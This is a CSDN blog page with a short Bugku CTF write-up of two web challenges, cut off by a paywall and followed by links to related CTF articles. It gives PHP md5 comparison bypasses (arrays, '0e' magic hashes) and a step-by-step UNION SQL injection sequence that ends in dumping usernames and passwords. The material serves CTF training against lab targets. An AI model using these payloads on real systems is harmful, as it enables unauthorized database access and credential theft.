[Bugku][Web][CTF] 16-29 write up

最新推荐文章于 2023-11-02 17:45:04 发布
VIP文章 最新推荐文章于 2023-11-02 17:45:04 发布
阅读量328 收藏
点赞数
分类专栏: CTF 文章标签: write up Bugku Web CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/dadongwudi/article/details/111770244
版权

【说明】 整合资源 简略版本2020Bugku write up

web16 备份是个好习惯
/index.php.bak 查看php代码
1.因为md5()函数加密不能处理数组,则key1和key2的返回值为空,即可获得flag
http://123.206.87.240:8002/web16/?kkeyey1[]=1&kkeyey2[]=4
2.利用==比较漏洞
如果两个字符经MD5加密后的值为 0exxxxx形式,就会被认为是科学计数法,且表示的是0*10的xxxx次方,还是零,都是相等的。
下列的字符串的MD5值都是0e开头的:
QNKCDZO
240610708
s878926199a
s155964671a
s214587387a
s214587387a
http://123.206.87.240:8002/web16/?kkeyey1=s214587387a&kkeyey2=240610708

参考连接:https://blog.csdn.net/qq_42133828/article/details/84871544?utm_medium=distribute.pc_relevant.none-task-blog-searchFromBaidu-2.not_use_machine_learn_pai&depth_1-utm_source=distribute.pc_relevant.none-task-blog-searchFromBaidu-2.not_use_machine_learn_pai

web17 sql注入
sqlmap工具或Hackbar手动注入
1.判断是否存在注入,注入是字符型还是数字型
抓包更改参数id为
1′ or 1=1 #
2.猜解SQL查询语句中的字段数
1 order by 2 #
1 order by 3 #
3.确定显示的字段顺序
1 union select 1,2 #
4.获取当前数据库
1 union select 1,database() #
5.获取数据库中的表
1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #
6.获取表中的字段名
1 union select 1,group_concat(column_name) from information_schema.columns where table_name=0×7573657273 #
7.下载数据
1 or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #
参考链接:https://blog.csdn.net/qq_35811830/article/details/86655279?utm_medium=distribute.pc_relevant_t0.none-task-blog-BlogCommendFromBaidu-1.not_use_machine_learn_pai&depth_1-utm_source=distribute.pc_relevant_t0.none-task-blog-BlogCommendFromBaidu-1.not_use_machine_learn_pai

最低0.47元/天 解锁文章
CryptWinter
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
封神台ctf练习靶场——一月靶场
AlunXZhou的博客
03-18 1418
封神台刷题
php 绕过 stripos,PHP的两个特性导致waf绕过注入(有趣的知识点)
weixin_29692851的博客
03-28 1517
1、HPP HTTP参数污染HTTP参数污染指的是,在URL中提交相同键值的两个参数时,服务器端一般会进行一些处理。比如Apache就要以最后一个参数为准,比如:user.php?id=111&id=222如果输出$_GET数组,则id的值只会取222,即URL上提交的多余值覆盖了前一个值。2、一个CTF题目关于注入的waf绕过,注入点为:Default$sql="select * fro...
php一些特性函数(ctfshow)
qq_62046696的博客
06-22 1874
preg_match()返回 pattern 的匹配次数。 它的值将是0次(不匹配)或1次,因为preg_match()在第一次匹配后 将会停止搜索。preg_match_all()不同于此,它会一直搜索subject 直到到达结尾。 如果发生错误preg_match()返回 FALSE。情况1:get方式传入num参数,然后通过preg_match判断是否存在数字,如果存在,就die,不存在的话然后intval函数判断整数,通过数组绕过preg_match,因为preg_match无法处理数组情况2:if
php 绕过 stripos,PHP stripos()、strripos()和strrpos() 使用方法和区别
weixin_36068796的博客
03-28 1430
stripos():查找字符串首次出现的位置(不区分大小写)写法:stripos ( string $haystack , string $needle [, int $offset = 0 ] )haystack:在该字符串中查找。needle:注意 needle 可以是一个单字符或者多字符的字符串。如果 needle 不是一个字符串,那么它将被转换为整型并被视为字符顺序值。offset:可选的...
PHP特性&缺陷对比函数&CTF考点
m0_63917373的博客
09-13 2099
PHP特性&缺陷对比函数&CTF考点 ctf Show-web
bugkuctf解题-WEB
05-04
bugku writeup,web解题writeup,根据网上的writeup自行解题后整理的日记,与大家分享,大家有新方法的也可以评论中告诉我,共同进步。——CTF菜鸟敬上。
CTF-Write-up:CTF撰写和信息
03-21
CTF-Write-up:CTF撰写和信息
bugkuctf解题-杂项
05-04
bugku writeup,杂项解题writeup,根据网上的writeup自行解题后整理的日记,与大家分享,大家有新方法的也可以评论中告诉我,共同进步。——CTF菜鸟敬上。
CTF-Write-UP
03-09
UMCTF竞赛Noob的Hackathon公开组 其他-UMCTF2021-Macow 写信作者: Louis Lou 标志: MOCSCTF {1_4m_l1v1n6_1n_534c_p41_v4n_p4rk_n0...首先解压缩文件,然后利用IDE编辑器搜索“ CTF”,另一部分通过搜索“}”找到。
BugKu 2021 CTF AWD 排位赛 真题 S2 AWD排位赛-7.zip
12-07
BugKu 2021 CTF AWD 排位赛 真题
XSS跨站脚本攻击漏洞之2DVWA中的利用和绕过
ISNS的博客
03-07 834
说在开头:文章是我通过查询资料后按照自己的理解总结出来的,所以如果有说法不对的地方,欢迎大佬指正~ DVWA是一款非常好的web漏洞练习平台,也是一款非常好的学习php代码审计的一个平台。我们可以利用它来学习XSS漏洞。 安装环境 平台搭建好以后,登录账号:admin,密码:password。 设置安全级别 一共有四个级别:Low、Medium、High、impossible。 我们依次测试每个...
BugkuCTFWeb--never give up
VZZmieshenquan的博客
02-11 3378
Description: http://123.206.87.240:8006/test/hello.php 作者:御结冰城 Solution: 打开页面,查看源代码发现有个1p.html,将网址改成123.206.87.240:8006/test/1p.html发现跳转到了www.bugku.com,猜测应该是有重定向的代码,那直接看源代码就行,输入view-source:123.206...
Bugku——strpos数组绕过
热门推荐
王嘟嘟的博客
11-01 1万+
0x00 前言 不想学习,简单的做一做CTF的题目。 看到了CTF里的排名,然后好像又有了动力。 题目 0x01 start 题目说的很清楚。数组绕过。那我们来看一下源码,然后来进行测试。 <?php $flag = "flag"; if (isset ($_GET['ctf'])) { if (@ereg ("^[1-9]+$", $_GET['ctf']) === FALSE) ech...
CTF中的PHP特性
qq_45086218的博客
02-26 4050
文章目录正则表达式元字符模式修正符preg_match()数组绕过换行绕过intval()字符绕过科学计数法进制转换小数点绕过strpos()md5强类型比较弱类型比较md5碰撞file_put_contents()in_array()优先级 本文以ctf.show网站题目为例,总结ctf中的php特性 正则表达式 元字符 模式修正符 preg_match() 数组绕过 preg_match()只能处理字符串,当传入的subject是数组时会返回false if(preg_match("/[0-9]/
文件上传-绕过/验证
硫酸超的博客
08-11 904
文件上传文件上传验证后缀名:黑名单,白名单文件类型:MIME信息 文件上传验证 后缀名,类型,文件头 后缀名:黑名单,白名单 黑名单:明确不允许上传的格式后缀 asp php jsp aspx cgi war… 缺陷:如果php phtml…没有定义到后名单里,可以用这格式绕过限制 白名单:明确可以上传的格式后缀 jpg png zip rar gif … 白名单验证要更安全 文件类型:MIME信息 Content-Type称之为MIME信息 文件头:内容头信息 演示案例:uploadlabs关卡分析
第21、22天:WEB漏洞-文件上传之后端黑白名单以及内容逻辑数组绕过
cailme的博客
05-26 541
渗透测试day21、22
php rce和绕过
m0_73973498的博客
10-08 1837
php?>是正和常情况下的标签,用于识别这是个php文件,但php也允许使用短标签和等价于
CSRF攻击(2), 绕过Referer防御
探测???
11-02 659
这里可以看到 Referer 中由于包含了文件名, 所以就间接包含有目标服务器的ip, 绕过了后端对 SERVER_NAME 的判断, 密码修改成功.这里看到表单类型的链接, 点击后 Referer 只包含攻击者的ip, 并没有目标ip, 因此被防御.策略,这将导致浏览器在Referer头中发送完整的URL,为了避免出现这种情况, 可以在HTML文件中使用。当使用一个普通的表单类型的钓鱼链接时, 比如。, 浏览器会根据这个策略发送Referer头.标签会指示浏览器在发送请求时使用。
关于PHP内部编码与mysql字符差异问题的研究
springsunss的博客
04-25 745
转载自:http://bobao.360.cn/learning/detail/3209.html1.引入最近稍稍研究了下关于PHP的内部编码的问题,以及mysql的字符差异的问题,分享下心得,如果有误请大家及时指正。至于为什么要介绍mysql字符差异问题,是因为普遍将其原因归纳于PHP编码与mysql的UTF-8编码不统一,但实际上这个只是mysql单方面的原因而与PHP的编码方式无关。另外本文不
bugku ctf sqli-0x1题解
最新发布
03-23
bugku ctf是一个CTF(Capture The Flag)比赛平台,提供各种类型的安全挑战题目供参赛者解答。sqli-0x1是其中一个SQL注入题目,下面是该题目的解题思路: 1. 题目描述:sqli-0x1是一个简单的SQL注入题目,要求获取...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值